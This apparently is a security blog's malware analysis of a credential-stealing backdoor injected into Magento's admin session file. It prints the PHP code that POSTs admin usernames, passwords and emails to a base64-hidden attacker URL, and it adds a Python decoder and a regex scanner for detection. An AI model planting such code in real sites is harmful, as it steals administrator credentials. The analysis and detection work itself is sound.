While investigating a compromised Magento-based ecommerce website, we found malicious code being used to steal credentials and maintain unauthorized access to user accounts.
The code was injected into the core file ./app/code/core/Mage/Admin/Model/Session.php, which handles logins to the Magento admin panel, and it posts the stolen credentials to a remote URL every time a user logs in:
// Body of the outbound request: "<victim host>=" followed by the login username,
// password, the user's email address and the current URL, JSON-encoded and then base64-encoded
$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array(
    $username,
    $password,
    $user->getEmail(),
    Mage::helper('core/url')->getCurrentUrl()
)));
// POST it to the attacker's collection URL, which is stored base64-encoded to hide it from casual inspection
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, base64_decode(REMOVED MALICIOUS CODE));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_TIMEOUT, 20); // give up after 20 seconds so a dead drop site does not stall the login
$output = curl_exec($ch);
curl_close($ch);
The destination of the stolen username and password is the base64-encoded string passed to base64_decode(REMOVED MALICIOUS CODE), a common trick to keep the URL out of plain-text searches.
Decoding that string in this case gave the following malicious URL, to which the credentials, email address and login URL were posted:
http://infected-site.com/404.php
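The following is an added example (Python), not code from the original write-up or from Magento. It reproduces the exfiltration format visible in the snippet above (a POST body of the form host=base64(json([username, password, email, url]))), recovers the stolen fields from a captured body such as a proxy or WAF log entry, and scans PHP source for the indicator in the snippet: a curl request whose CURLOPT_URL is wrapped in base64_decode. The hostnames, credentials and PHP snippets below are constructed for the example; the "clean" PHP is a stand-in, not actual Magento source.

```python
import base64
import json
import re


def build_exfil_body(host, username, password, email, url):
    """Rebuild the POST body exactly as the injected PHP builds it:
    $_SERVER['HTTP_HOST'] . "=" . base64_encode(json_encode(array(...)))
    Used here only to produce test input; a real sample comes from traffic or logs."""
    payload = json.dumps([username, password, email, url], separators=(",", ":"))
    return host + "=" + base64.b64encode(payload.encode()).decode()


def decode_exfil_body(body):
    """Recover the victim host and the four stolen fields from a captured body.
    Returns a dict, or None if the body does not follow the malware's format.
    Base64 never contains '=' except as trailing padding, so splitting on the
    first '=' separates the host from the blob reliably."""
    host, sep, blob = body.strip().partition("=")
    if not sep or not host:
        return None
    try:
        fields = json.loads(base64.b64decode(blob, validate=True))
    except ValueError:  # binascii.Error and JSONDecodeError are both ValueError subclasses
        return None
    if not (isinstance(fields, list) and len(fields) == 4):
        return None
    return {
        "victim_host": host,
        "username": fields[0],
        "password": fields[1],
        "email": fields[2],
        "url": fields[3],
    }


# Indicator from the snippet on the page: curl pointed at a base64_decode()'d URL.
# Legitimate code almost never hides its own endpoint this way.
EXFIL_PATTERN = re.compile(
    r"curl_setopt\s*\(\s*\$\w+\s*,\s*CURLOPT_URL\s*,\s*base64_decode\s*\(",
    re.IGNORECASE,
)


def scan_php_source(src):
    """Return (line_number, line) for every line matching the exfil indicator.
    The injected code was a single line, so a line-by-line search is enough here."""
    return [(n, line.strip()) for n, line in enumerate(src.splitlines(), 1)
            if EXFIL_PATTERN.search(line)]


# Constructed stand-in for a login method; NOT the real Mage_Admin_Model_Session code.
CLEAN_SNIPPET = """<?php
class Mage_Admin_Model_Session_Example
{
    public function login($username, $password)
    {
        $user = Mage::getModel('admin/user')->login($username, $password);
        return $user;
    }
}
"""

# Same stand-in with the one-line backdoor from the page spliced in (URL placeholder kept).
INJECTED_LINE = ("$post = $_SERVER['HTTP_HOST'].\"=\".base64_encode(json_encode(array($username,$password,"
                 "$user->getEmail(),Mage::helper('core/url')->getCurrentUrl())));$ch = curl_init();"
                 "curl_setopt($ch,CURLOPT_URL, base64_decode('REMOVED'));curl_setopt($ch,CURLOPT_POST, 1);"
                 "curl_setopt($ch,CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_TIMEOUT, 20);"
                 "$output = curl_exec($ch);curl_close($ch);")
INFECTED_SNIPPET = CLEAN_SNIPPET.replace("        return $user;", "        " + INJECTED_LINE + "\n        return $user;")


if __name__ == "__main__":
    # Constructed sample values, not real credentials.
    body = build_exfil_body("shop.example", "admin", "Pa55w0rd!", "admin@shop.example",
                            "https://shop.example/index.php/admin/")
    print("captured body:", body)
    print("decoded      :", decode_exfil_body(body))
    for n, line in scan_php_source(INFECTED_SNIPPET):
        print("suspicious line %d: %s..." % (n, line[:60]))
    print("clean file hits:", scan_php_source(CLEAN_SNIPPET))
```

The regex is deliberately narrow so it can be run across a whole webroot with few false positives; for the core directory itself, the authoritative check is a diff against a pristine copy of the same Magento release, since no clean core file should differ at all.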
Customer personal information (full names, email addresses, physical addresses, and any stored credit card or payment details) should be considered compromised and leaked.
With full control over the Magento administration panel, the attacker can also redirect payments to their own PayPal account or another payment gateway and steal money directly.
Such attacks can severely damage your business reputation and your customers' trust.
It is always good practice to keep your website updated and properly maintained, and to use applications, themes and extensions/plugins from trusted sources only. Since this backdoor was injected into a core file, also compare your core files against a clean copy of the same Magento version and review their modification times; any change to a file under ./app/code/core is a red flag that warrants a closer look.